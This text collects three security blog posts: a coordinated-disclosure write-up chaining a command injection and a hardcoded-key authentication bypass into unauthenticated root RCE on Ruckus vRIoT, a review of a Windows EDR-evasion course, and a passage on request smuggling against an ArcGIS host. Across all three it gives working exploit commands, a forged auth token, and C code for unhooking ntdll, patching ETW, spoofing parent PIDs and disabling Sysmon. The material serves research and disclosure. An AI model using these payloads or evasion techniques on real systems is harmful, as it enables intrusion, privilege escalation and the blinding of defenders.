Remote Command Execution in Ruckus IoT Controller (CVE-2020-26878 & CVE-2020-26879)

25 October 2020 at 00:00

Dear Fellowlship, today’s homily is about two vulnerabilities (CVE-2020-26878 and CVE-2020-26879) found in Ruckus vRIoT that can be chained together to get remote command execution as root. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

We reported the vulnerability to the Ruckus Product Security Team this summer (26/Jul/2020) and they instantly checked and acknowledged the issues. After that, both parties agreed to set the disclosure date to October the 26th (90 days). We have to say that the team was really nice to us and that they kept us informed every month. If only more vendors had the same good faith.

Introduction

Every day more people are turning their homes into “Smart Homes”, so we are developing an immeasurable desire to find vulnerabilities in components that manage IoT devices in some way. We discovered the “Ruckus IoT Suite” and wanted to hunt for some vulnerabilities. We focused on Ruckus IoT Controller (Ruckus vRIoT), which is a virtual component of the “IoT Suite” in charge of integrating IoT devices and IoT services via exposed APIs.

Ruckus IoT architecture
Example of IoT architecture with Ruckus platforms (extracted from their website)

This software is provided as a VM in OVA format (Ruckus IoT 1.5.1.0.21 (GA) vRIoT Server Software Release), so it can be run in VMware or VirtualBox. This is a good way of obtaining and analyzing the software, as it serves as a testing platform.

Warming up

Our first step is to perform a bit of recon to check the attack surface, so we run the OVA inside a hypervisor and execute a simple port scan to list exposed services:

PORT      STATE    SERVICE    REASON      VERSION
22/tcp    open     ssh        syn-ack     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http       syn-ack     nginx
443/tcp   open     ssl/http   syn-ack     nginx
4369/tcp  open     epmd       syn-ack     Erlang Port Mapper Daemon
5216/tcp  open     ssl/http   syn-ack     Werkzeug httpd 0.12.1 (Python 3.5.2)
5672/tcp  open     amqp       syn-ack     RabbitMQ 3.5.7 (0-9)
9001/tcp  filtered tor-orport no-response
25672/tcp open     unknown    syn-ack
27017/tcp filtered mongod     no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are some interesting services. If we try to log in via SSH (admin/admin), we obtain a restricted menu where we can barely do anything:

1 - Ethernet Network
2 - System Details
3 - NTP Setting
4 - System Operation
5 - N+1
6 - Comm Debugger
x - Log Off

So our next step should be to get access to the filesystem and understand how this software works. We could not jailbreak the restricted menu, so we need to extract the files in a less fancy way: let’s sharpen our claws to gut the vmdk files.

In the end an OVA file is just a package that holds all the components needed to virtualize a system, so we can extract its contents and mount the virtual machine disk with the help of qemu and the NBD driver.

7z e file.ova
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 file.vmdk
sudo mount /dev/nbd1p1 /mnt

If that worked you can now access the whole filesystem:

psyconauta@insulanova:/mnt|⇒  ls
bin      data  home        lib64       mqtt-broker  root  srv  usr      VRIOT
boot     dev   initrd.img  lost+found  opt          run   sys  var      vriot.d
cafiles  etc   lib         mnt         proc         sbin  tmp  vmlinuz

We can see in the /etc/passwd file that the user “admin” does not have a regular shell:

admin:x:1001:1001::/home/admin:/VRIOT/ops/scripts/ras

That ras file is a bash script that corresponds to the restricted menu that we saw before.

BANNERNAME="                                Ruckus IoT Controller"
MENUNAME="                                      Main Menu"

if [ $TERM = "ansi" ]
then
set TERM=vt100
export TERM
fi

main_menu () {
draw_screen
get_input
check_input
if [ $? = 10 ] ; then main_menu ; fi
}


##------------------------------------------------------------------------------------------------
draw_screen () {
clear
echo "*******************************************************************************"
echo "$BANNERNAME"
echo "$MENUNAME"
echo "*******************************************************************************"
echo ""
echo "1 - Ethernet Network"
echo "2 - System Details"
echo "3 - NTP Setting"
echo "4 - System Operation"
echo "5 - N+1"
echo "6 - Comm Debugger"
echo "x - Log Off"
echo
echo -n "Enter Choice: "
}
...

Remote Command Injection (CVE-2020-26878)

Usually all these IoT routers/switches/etc. with a web interface contain functions that execute OS commands using user-controlled input. That means that if the input is not correctly sanitized, we can inject arbitrary commands. This is the lowest-hanging fruit that always has to be checked, so our first task is to find the files related to the web interface:

psyconauta@insulanova:/mnt/VRIOT|⇒  find -iname "*web*" 2> /dev/null
./frontend/build/static/media/fontawesome-webfont.912ec66d.svg
./frontend/build/static/media/fontawesome-webfont.af7ae505.woff2
./frontend/build/static/media/fontawesome-webfont.674f50d2.eot
./frontend/build/static/media/fontawesome-webfont.b06871f2.ttf
./frontend/build/static/media/fontawesome-webfont.fee66e71.woff
./ops/packages_151/node_modules/faye-websocket
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket.js
./ops/packages_151/node_modules/faye-websocket/lib/faye/websocket
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocketServer.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/ws/lib/WebSocket.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/mqtt/test/websocket_client.js
./ops/packages_151/node_modules/node-red-contrib-kontakt-io/node_modules/websocket-stream
./ops/packages_151/node_modules/sockjs/lib/webjs.js
./ops/packages_151/node_modules/sockjs/lib/trans-websocket.js
./ops/packages_151/node_modules/websocket-extensions
./ops/packages_151/node_modules/websocket-extensions/lib/websocket_extensions.js
./ops/packages_151/node_modules/node-red-contrib-web-worldmap
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.svg
./ops/packages_151/node_modules/node-red-contrib-web-worldmap/worldmap/leaflet/font-awesome/fonts/fontawesome-webfont.woff2
./ops/packages_151/node_modules/websocket-driver
./ops/packages_151/node_modules/websocket-driver/lib/websocket
./ops/docker/webservice
./ops/docker/webservice/web_functions.py
./ops/docker/webservice/web_functions_helper.py
./ops/docker/webservice/web.py

This way we identified several web-related files, and saw that the web interface is built on top of Python scripts. In Python there are lots of dangerous functions that, when used incorrectly, can lead to arbitrary code/command execution. The easy way is to try to find os.system() calls with user-controlled data in the main web file. A simple grep will shed light:

psyconauta@insulanova:/mnt/VRIOT|⇒  grep -i "os.system" ./ops/docker/webservice/web.py -A 5 -B 5
            reqData = json.loads(request.data.decode())
        except Exception as err:
            return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        userpwd = 'useradd '+reqData['username']+' ; echo  "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
        #call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
        os.system(userpwd)
        call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
    except Exception as err:
        print("err=",err)
        devNullFile.close()
        return errorResponseFactory(str(err), status=400)
--
            slave_ip = reqData['slave_ip']
            if reqData['slave_ip'] != config.get("vm_ipaddress"):
                master_ip = reqData['slave_ip']
                slave_ip = reqData['master_ip']
            crontab_str = "crontab -l | grep -q 'ha_slave.py' || (crontab -l ; echo '*/5 * * * * python3 /VRIOT/ops/scripts/haN1/ha_slave.py 1 "+master_ip+" "+slave_ip+" >> /var/log/cron_ha.log 2>&1') | crontab -"
            os.system(crontab_str)
            #os.system("python3 /VRIOT/ops/scripts/haN1/n1_process.py > /dev/null 2>&1 &")
    except Exception as err:
        devNullFile.close()
        return errorResponseFactory(str(err), status=400)
    else:
        devNullFile.close()
--
        call(['rm','-rf','/etc/corosync/authkey'],stdout=devNullFile)
        call(['rm','-rf','/etc/corosync/corosync.conf'],stdout=devNullFile)
        call(['rm','-rf','/etc/corosync/service.d/pcmk'],stdout=devNullFile)
        call(['rm','-rf','/etc/default/corosync'],stdout=devNullFile)
        crontab_str = "crontab -l | grep -v 'ha_slave.py' | crontab -"
        os.system(crontab_str)
        
        cmd = "supervisorctl status all | awk '{print $1}'"
        process_list = check_output(cmd,shell=True).decode('utf-8').split("\n")
        for process in process_list:
            if process and process != 'nplus1_service':
--
                        call(['service','sshd','stop'])
                        config.update("vm_ssh_enable","0")
                    call(['supervisorctl','restart','app:mqtt_service'])
                    call(['supervisorctl', 'restart', 'celery:*'])
                    if reqData["vm_ssh_enable"] == "0":
                        os.system("kill $(ps aux | grep 'ssh' | awk '{print $2}')")
            except Exception as err:
                return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        elif request.method == 'GET':
                response_json = {
                    "offline_upgrade_enable" : config.get("offline_upgrade_enable"),

The first occurrence already looks vulnerable to command injection. Checking that code snippet in context confirms it:

@app.route("/service/v1/createUser",methods=['POST'])
@token_required
def create_ha_user():
    try:
        devNullFile = open(os.devnull, 'w')
        try:
            reqData = json.loads(request.data.decode())
        except Exception as err:
            return Response(json.dumps({"message": {"ok": 0,"data":"Invalid JSON"}}), 200)
        userpwd = 'useradd '+reqData['username']+' ; echo  "'+reqData['username']+':'+reqData['password']+'" | chpasswd >/dev/null 2>&1'
        #call(['useradd ',reqData['username'],'; echo',userpwd,'| chpasswd'])
        os.system(userpwd)
        call(['usermod','-aG','sudo',reqData['username']],stdout=devNullFile)
    except Exception as err:
        print("err=",err)
        devNullFile.close()

We can see how, when calling the /service/v1/createUser endpoint, some parameters are taken directly from the POST request body (JSON-formatted) and concatenated into an os.system() call. As this concatenation is done without proper sanitization, we can inject arbitrary commands with ;. The vulnerability is easily confirmed using an HTTP server (python -m SimpleHTTPServer) as a canary:

curl https://host/service/v1/createUser -k --data '{"username": ";curl http://TARGET:8000/pwned;#", "password": "test"}' -H "Authorization: Token 47de1a54fa004793b5de9f5949cf8882" -H "Content-Type: application/json"

Keep in mind that this method checks for a valid token (see the @token_required at line two of the snippet), so we need to be authenticated in order to exploit it. Our next step is to find a way to circumvent this check to get an RCE as an unauthenticated user.

Authentication bypass via API backdoor (CVE-2020-26879)

The first step to find a bypass would be to check the token_required function in order to understand how this “check” is performed:

def token_required(f):
    @wraps(f)
    def wrapper(*args, **kwargs):

        # Localhost Authentication
        if(request.headers.get('X-Real-Ip') == request.headers.get('host')):
            return f()
        # init call
        if(request.path == '/service/init' and request.method == 'POST'):
            return f()
        if(request.path == '/service/upgrade/flow' and request.method == 'POST'):
            return f()

        # N+1 Authentication  
        if "Token " not in request.headers.get('Authorization'):
            print('Auth='+request.headers.get('Authorization'))
            token = crpiot_obj.decrypt(request.headers.get('Authorization'))
            print('Token='+token)
            with open("/VRIOT/ops/scripts/haN1/service_auth") as fileobj:
                auth_code = fileobj.read().rstrip()
            if auth_code == token:
                return f()

        # Normal Authentication
        k = requests.get("https://0.0.0.0/app/v1/controller/stats",headers={'Authorization': request.headers.get('Authorization')},verify=False)
        if(k.status_code != 200):
            return Response(json.dumps({"detail": "Invalid Token."}), 401)
        else:
            return f()
    return wrapper

Let’s ignore the header comparison :) and focus on the N+1 authentication. As you can see, if the Authorization header does not contain the word “Token”, the header value is decrypted and compared with a hardcoded value from a file (/VRIOT/ops/scripts/haN1/service_auth). The encryption/decryption routines can be found in the file /VRIOT/ops/scripts/enc_dec.py:

    def __init__(self, salt='nplusServiceAuth'):
        self.salt = salt.encode("utf8")
        self.enc_dec_method = 'utf-8'
        self.str_key=config.get('n1_token').encode("utf8")




    def encrypt(self, str_to_enc):
        try:
            aes_obj = AES.new(self.str_key, AES.MODE_CFB, self.salt)
            hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
            mret = b64encode(hx_enc).decode(self.enc_dec_method)
            return mret
        except ValueError as value_error:
            if value_error.args[0] == 'IV must be 16 bytes long':
                raise ValueError('Encryption Error: SALT must be 16 characters long')
            elif value_error.args[0] == 'AES key must be either 16, 24, or 32 bytes long':
                raise ValueError('Encryption Error: Encryption key must be either 16, 24, or 32 characters long')
            else:
                raise ValueError(value_error)

The n1_token value can be found by grepping (spoiler: it is serviceN1authent). With all this information we can go to our Python console and create the magic value:

>>> from Crypto.Cipher import AES
>>> from base64 import b64encode, b64decode
>>> salt='nplusServiceAuth'
>>> salt = salt.encode("utf8")
>>> enc_dec_method = 'utf-8'
>>> str_key = 'serviceN1authent'
>>> aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
>>> hx_enc = aes_obj.encrypt('TlBMVVMx'.encode("utf8"))# From /VRIOT/ops/scripts/haN1/service_auth
>>> mret = b64encode(hx_enc).decode(enc_dec_method)
>>> print mret
OlDkR+oocZg=
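
The transcript above is Python 2; for reference, a rough Python 3 equivalent (a minimal sketch assuming the pycryptodome package, using the key, salt and plaintext values quoted above):

from base64 import b64encode
from Crypto.Cipher import AES

salt = b'nplusServiceAuth'   # 16 bytes, used as the AES-CFB IV
key = b'serviceN1authent'    # the hardcoded n1_token
plaintext = b'TlBMVVMx'      # content of /VRIOT/ops/scripts/haN1/service_auth

aes_obj = AES.new(key, AES.MODE_CFB, salt)
print(b64encode(aes_obj.encrypt(plaintext)).decode('utf-8'))  # OlDkR+oocZg=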

So setting the Authorization header to OlDkR+oocZg= is enough to bypass the token check and to interact with the API. We can combine this backdoor with our remote command injection:

curl https://host/service/v1/createUser -k --data '{"username": ";useradd \"exploit\" -g 27; echo  \"exploit\":\"pwned\" | chpasswd >/dev/null 2>&1;sed -i \"s/Defaults        rootpw/ /g\" /etc/sudoers;#", "password": "test"}' -H "Authorization: OlDkR+oocZg=" -H "Content-Type: application/json"

And now log in:

X-C3LL@Kumonga:~|⇒  ssh exploit@<target>
exploit@<target>'s password:
Could not chdir to home directory /home/exploit: No such file or directory
$ sudo su
[sudo] password for exploit:
root@vriot:/# id
uid=0(root) gid=0(root) groups=0(root)

So… PWNED! >:). We have a shiny unauthenticated RCE as root.

EoF

Maybe the vulnerability was easy to spot and easy to exploit, but a root shell is a root shell. And nobody can argue with you when you have a root shell.

We hope you enjoyed this reading! Feel free to give us feedback on Twitter @AdeptsOf0xCC.

A Review of the Sektor7 RED TEAM Operator: Windows Evasion Course

3 May 2021 at 15:20

Introduction

Another Sektor7 course, another review! This time it’s the RED TEAM Operator: Windows Evasion Course. You can catch my previous reviews of the RTO: Malware Development Essentials and RTO: Malware Development Intermediate courses as well.

Course Overview

This course, like the previous ones, builds on the knowledge gained in the previous courses. You don’t need to have taken the others if you already have a background in malware development, C++, assembly, and debugging, but if you haven’t, this will very likely be too advanced. The Essentials course might be much more your speed.

Here’s what Windows Evasion covers, according to the course page:

- How a modern detection looks like
- How to get rid of process' internal operations monitoring
- How to make your payload look benign in memory
- How to break process parent-child relation
- How to disrupt EPP/EDR logging
- What is Sysmon and how to bypass it

The course is split into 3 main sections: essentials, non-privileged user vector, and high-privileged user vector. I’ll cover each one, and then provide some thoughts on the course as a whole and the value it provides.

Section 1: Essentials

The course begins as usual, with links to the code and a custom VM with all the tools you’ll need. The first lesson is a detailed look at how modern EDR detection works, covering the different user-mode and kernel-mode components, static analysis, DLL injection, hooking, kernel callbacks, logging, and machine learning. This is as good an overview of the end-to-end setup of EDRs as I’ve seen. It lays the foundation for the subsequent topics in a nice logical way. It also covers the differences between EDRs and AV, how Sysmon fits in, and how the line between AV and EDRs is becoming more blurred.

Next in essentials, the focus is on defeating various static analysis techniques, specifically entropy, image file details, and code signing. The idea is to make your malicious binary as similar to known-good binaries as possible, with special attention paid to the elements that are commonly flagged by static analysis. None of this is ground-breaking or totally novel, but it does drive home the idea that details matter, and they can add up to the difference between successfully achieving execution on a target and being caught.

Section 2: Non-Privileged User Vector

Un/Hooking

The second section covers a range of techniques that can be performed without needing elevated privileges. It begins with an explanation and debugger-based demonstration of system call hooking, as performed by the main AV/EDR stand-in for the course, Bitdefender. Bitdefender is a good option here, as a trial license is freely available, and it does more EDR-like things than a normal AV, like hooking.

Next, several different methods of defeating user-mode hooking are demonstrated, beginning with the classic overwriting of the .text section of ntdll.dll, which I’ve also covered here. The main disadvantage of this method is the need to map an additional new copy of ntdll.dll into the process address space, which is rather unusual from an AV/EDR perspective.

One alternative to this is to use Hell’s Gate, by Am0nsec and Smelly. This method uses some clever assembly to dynamically resolve the syscall number of a given function from the local copy of ntdll.dll and execute it. However this method has some drawbacks as well, mainly the fact that it will fail if the function to be resolved has already been hooked.

Reenz0h has a neat new modification (new to me at least!) to Hell’s Gate that gets around this problem, which he calls Halo’s Gate. It takes advantage of the fact that the system calls contained within ntdll.dll are sorted in numerically ascending order. The trick is to identify that a syscall has been hooked by checking for the jmp opcode (0xE9), and then traversing ntdll.dll both ahead of and behind the target syscall. If an unhooked syscall is found 8 functions after the target, and its value is 0xFD, then subtracting 8 from 0xFD gives 0xF5, the target syscall number. The same applies for a syscall before the target function, except the distance is added instead. As no EDR hooks every syscall, eventually a clean one will be found and the target syscall number can be successfully calculated. This property of ordered syscall numbers in ntdll.dll is exploited to great effect in SysWhispers2. It was originally documented by the prolific modexp in a blog post here.
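
To make the walk concrete, here is a rough C sketch of the idea (my own illustration, not the course code), assuming the usual 32-byte spacing between neighboring Zw* stubs in x64 ntdll.dll and the clean-stub prologue 4C 8B D1 B8 (mov r10, rcx; mov eax, imm32):

#include <windows.h>
#include <stdio.h>

#define STUB_SIZE 32  // distance between neighboring syscall stubs in x64 ntdll

// Resolve the syscall number of a (possibly hooked) ntdll function, or -1.
int ResolveSyscallNumber(BYTE *fn)
{
    if (fn[0] == 0x4C && fn[1] == 0x8B && fn[2] == 0xD1 && fn[3] == 0xB8)
        return *(WORD *)(fn + 4);              // unhooked: read the number directly

    if (fn[0] != 0xE9)                         // no jmp rel32 -> nothing we recognize
        return -1;

    for (int i = 1; i < 64; i++) {             // hooked: walk the neighbors
        BYTE *up = fn + i * STUB_SIZE;         // i stubs after the target
        if (up[0] == 0x4C && up[1] == 0x8B && up[2] == 0xD1 && up[3] == 0xB8)
            return *(WORD *)(up + 4) - i;      // neighbor's number minus distance
        BYTE *down = fn - i * STUB_SIZE;       // i stubs before the target
        if (down[0] == 0x4C && down[1] == 0x8B && down[2] == 0xD1 && down[3] == 0xB8)
            return *(WORD *)(down + 4) + i;    // neighbor's number plus distance
    }
    return -1;
}

int main(void)
{
    BYTE *p = (BYTE *)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
    printf("syscall number: %d\n", ResolveSyscallNumber(p));
    return 0;
}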

The last method of unhooking is a twist on the first, named, and I quote, “Perun’s Fart”. The goal is to get a clean copy of ntdll.dll without mapping it into our process again. It turns out that if a process is created in a suspended state, ntdll.dll is mapped by the Windows loader as part of the normal new-process creation flow, but EDR hooks are not applied, since the main thread has not yet begun execution. So we can steal its copy of ntdll.dll and overwrite our local hooked version. Obviously this is a trade-off, as this method will create a new process and involve cross-process memory reads. Still, it’s good to have multiple options when it comes to unhooking.
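
A simplified sketch of that flow (again my own illustration, not the course sample), using notepad.exe as a placeholder for the sacrificial suspended process:

#include <windows.h>
#include <string.h>

// Overwrite our hooked ntdll.dll .text with a clean copy stolen from a
// freshly spawned, still-suspended process (no EDR hooks applied there yet).
BOOL RefreshNtdll(void)
{
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    if (!CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL,
                        FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
        return FALSE;

    BYTE *base = (BYTE *)GetModuleHandleA("ntdll.dll");
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + ((IMAGE_DOS_HEADER *)base)->e_lfanew);
    IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt);
    BOOL ok = FALSE;

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (strcmp((char *)sec->Name, ".text") != 0) continue;

        // ntdll is loaded at the same base in every process, so our local
        // .text address is valid inside the suspended child as well.
        BYTE *text = base + sec->VirtualAddress;
        SIZE_T size = sec->Misc.VirtualSize;
        BYTE *clean = (BYTE *)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);

        if (clean && ReadProcessMemory(pi.hProcess, text, clean, size, NULL)) {
            DWORD old;
            VirtualProtect(text, size, PAGE_EXECUTE_READWRITE, &old);
            memcpy(text, clean, size);          // stomp the hooks with clean bytes
            VirtualProtect(text, size, old, &old);
            ok = TRUE;
        }
        if (clean) VirtualFree(clean, 0, MEM_RELEASE);
        break;
    }
    TerminateProcess(pi.hProcess, 0);           // dispose of the sacrificial process
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return ok;
}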

ETW Bypass

Next up is coverage of Event Tracing for Windows (ETW), how it can rat you out to AV/EDR, and how to blind it in your local process. ETW is especially relevant when executing .NET assemblies, such as in Cobalt Strike’s execute-assembly, as it can inform defenders of the exact assembly name and methods executed. The solution in this case is simple: patch the EtwEventWrite function to return early with 0 in the RAX register. Any time an ETW event is sent by the process, it will appear to succeed without the message actually being written. Sweet and simple.
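
The patch itself fits in a handful of lines; a minimal x64 sketch (my own, with the usual caveat that toggling page protections is itself an IOC):

#include <windows.h>
#include <string.h>

// Blind ETW in the current process: EtwEventWrite returns 0 immediately.
void PatchEtw(void)
{
    unsigned char patch[] = { 0x48, 0x31, 0xC0, 0xC3 };  // xor rax, rax ; ret
    void *fn = (void *)GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite");
    DWORD old;
    VirtualProtect(fn, sizeof(patch), PAGE_EXECUTE_READWRITE, &old);
    memcpy(fn, patch, sizeof(patch));
    VirtualProtect(fn, sizeof(patch), old, &old);        // restore protection
}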

Avoiding IOCs

The last few videos of Section 2 cover different methods of hiding some specific indicators that can reveal the presence of malicious activity. First is module stomping. This is a way of executing shellcode from within a loaded DLL, avoiding the telltale sign of memory allocations within the process that are not backed by files on disk. A DLL that the host process does not use is loaded, then partially hollowed out and replaced with shellcode. Since the original DLL is properly loaded, no indication of injected shellcode is present.

Lastly this section covers hiding parent-child process ID relationships. The usual method is covered for PPID spoofing, using UpdateProcThreadAttribute to set the PPID to an arbitrary parent process. However, two other methods I’d not encountered were covered as well. First, it turns out that processes created by the Windows task scheduler become children of the task scheduler svchost.exe process, and code is provided to use the Win32 API to execute a payload this way. The other method is one used by Emotet, which uses COM to programmatically run WMI and create a new process. The parent in this case is the WmiPrvSE.exe process.
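
For the first method, a trimmed-down sketch of PPID spoofing via UpdateProcThreadAttribute (my own illustration; most error handling omitted):

#include <windows.h>

// Spawn `image` with an arbitrary parent process (PPID spoofing).
BOOL SpawnWithParent(DWORD parentPid, wchar_t *image)
{
    HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, parentPid);
    if (!hParent) return FALSE;

    SIZE_T size = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);   // query required size
    LPPROC_THREAD_ATTRIBUTE_LIST attrs =
        (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
    InitializeProcThreadAttributeList(attrs, 1, 0, &size);
    UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                              &hParent, sizeof(hParent), NULL, NULL);

    STARTUPINFOEXW si = { 0 };
    si.StartupInfo.cb = sizeof(si);
    si.lpAttributeList = attrs;
    PROCESS_INFORMATION pi = { 0 };

    BOOL ok = CreateProcessW(NULL, image, NULL, NULL, FALSE,
                             EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                             &si.StartupInfo, &pi);
    DeleteProcThreadAttributeList(attrs);
    HeapFree(GetProcessHeap(), 0, attrs);
    CloseHandle(hParent);
    return ok;
}

// Example (CreateProcessW may modify the command-line buffer):
//   wchar_t cmd[] = L"C:\\Windows\\System32\\notepad.exe";
//   SpawnWithParent(explorerPid, cmd);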

Section 3: High-Privileged User Vector

This section covers a variety of techniques that are available in high-privilege contexts. The focus is on Windows Eventlog, interrupting AV/EDR network communication, and Sysmon.

Eventlog

One video covers a method of hiding your activities from the Windows Eventlog. The idea is that the service responsible for the Eventlog, “Windows Event Log”, has several threads that handle the processing of event log messages. By suspending these threads, the service continues to run but does not process any events, thus hiding our activity. One caveat is that if the threads are resumed, all events that were missed in the interim will be processed, unless the machine is rebooted.

AV/EDR Network Communication

The next section looks at severing the connection between AV/EDR and its remote monitoring/logging server. This is done in two primary ways: adding Windows Firewall rules, and sink-holing traffic via the routing table. These two are pretty self-explanatory, but the real value here is the code samples provided for doing this in C/C++. The infamous and terrible COM is used in several places, and provides a good working example of COM programming. Creating routing table entries is actually a simple Win32 API call away.
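
As an illustration of the routing angle, black-holing the EDR console with a single host route via CreateIpForwardEntry might look like this (a sketch with placeholder addresses, not the course’s exact sample):

#include <winsock2.h>
#include <ws2tcpip.h>
#include <iphlpapi.h>
#include <stdio.h>
#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")

int main(void)
{
    MIB_IPFORWARDROW row = { 0 };
    InetPtonA(AF_INET, "203.0.113.10", &row.dwForwardDest);    // EDR console (placeholder)
    InetPtonA(AF_INET, "255.255.255.255", &row.dwForwardMask); // /32 host route
    InetPtonA(AF_INET, "192.0.2.1", &row.dwForwardNextHop);    // dead-end next hop (placeholder)
    GetBestInterface(row.dwForwardDest, &row.dwForwardIfIndex);
    row.dwForwardType = MIB_IPROUTE_TYPE_INDIRECT;
    row.dwForwardProto = MIB_IPPROTO_NETMGMT;                  // statically configured route
    row.dwForwardMetric1 = 1;

    DWORD rc = CreateIpForwardEntry(&row);                     // requires admin
    printf("CreateIpForwardEntry: %lu\n", rc);
    return 0;
}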

Sysmon

The final section of the course covers identifying and neutralizing Sysmon. Sysmon is an excellent tool and frequently the backbone of many AV/EDR collection strategies, so identifying its presence and disabling its capabilities can go a long way in hiding your activities.

One problem for attackers is that Sysmon by design can be concealed in various ways. The name of the user-mode process, the minifilter driver name, and its altitude can all be modified to hide Sysmon’s presence. However, there are enough reliable ways, like checking registry keys, to identify it. Code and commands are provided to find the registry keys, along with several techniques for shutting down Sysmon. One is to unload the minifilter driver. Another harks back to earlier in the course and shows how to patch our friend EtwEventWrite.
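
As one concrete example of the first approach, the FilterUnload API drops a minifilter by name, equivalent to “fltmc unload” (my sketch, not the course code; it needs an elevated context, and “SysmonDrv” is only the default driver name, which can be changed at install time):

#include <windows.h>
#include <fltuser.h>
#include <stdio.h>
#pragma comment(lib, "fltlib.lib")

int main(void)
{
    HRESULT hr = FilterUnload(L"SysmonDrv");   // default Sysmon driver name
    if (SUCCEEDED(hr))
        printf("minifilter unloaded\n");
    else
        printf("FilterUnload failed: 0x%08lx\n", (unsigned long)hr);
    return 0;
}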

Takeaways

If you’ve read my other reviews of Sektor7 courses, you know what I’m going to say here. They are fantastic, and a fantastic value for the money as well, as most are around $200-250 USD. You can buy all 5 current courses for less than almost any other training out there, and 2573 times less than a single SANS course. You get lifetime access, and most importantly, the code samples. This to me is by far the single most valuable part of the course. Reenz0h is a great instructor with a wealth of knowledge and a great presentation style, but the true gift he gives you is a firm foundation of working code samples to build from and the context of how they are used. This course specifically covers basic COM programming in as understandable a way as COM can be covered, in my opinion. I’ve found that I learn best when I have some working code to tweak, play with, look up its functions on MSDN, and mold it until it does what I want. No, the samples are not production-ready and undetectable in every case, but these courses give you the tools to make them that way and integrate them into your own tooling.

Conclusion

Props again to reenz0h and the Sektor7 crew. I’m glad they took a poll of their students and delivered a more advanced course. I get the feeling there is a ton more advanced material they could crank out, and I can’t wait for it.

Smuggling an (Un)exploitable XSS

13 November 2020 at 00:00

This is the story of how I chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal website users to arbitrary pages, without any user interaction. This post also introduces a 0day in ArcGIS Enterprise Server.

However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts.

Smuggling Requests for Different Response Lengths

What I usually do when having a look at a single application is try to identify endpoints that are likely to be proxied across the infrastructure. API endpoints are a common example, since those are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I found an asset exposing an API endpoint that was actually vulnerable to CL.TE-based request smuggling using a payload like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 132
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET / HTTP/1.1
Host: redacted.com
X: X

As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint.

To verify that, I’ve spun up a TurboIntruder instance using a configuration that issues the payload a hundred times:
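
The script itself isn’t reproduced here, but a minimal Turbo Intruder configuration along these lines (a sketch of the setup, not necessarily the exact one used) would be:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=100,
                           pipeline=False)
    for i in range(100):
        engine.queue(target.req)   # re-send the smuggling payload verbatim

def handleResponse(req, interesting):
    table.add(req)                 # sort by length to spot the two response sizes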

While TurboIntruder was running, I manually refreshed the page a couple of times to trigger (simulate) the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, of which one returned the original response of the API:

And the other returned the start page:

This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun.

Poisoning Links Through ArcGIS’ X-Forwarded-Url-Base Header

To extend my attack surface for the smuggling issue, I noticed that the same server was also running an instance of ArcGIS Enterprise Server under another directory. So I reviewed its source code for vulnerabilities that I could use to improve the request smuggling vulnerability, and stumbled upon an interesting combination affecting its generic error handling:

The ArcGIS error handler accepts a customized HTTP header called X-Forwarded-Url-Base that is used for the base of all links on the error page, but only if it is combined with another customized HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set.

So a minified request to exploit this issue against ArcGIS’ /rest/directories route looks like the following:

GET /rest/directories HTTP/1.1
Host: redacted.com
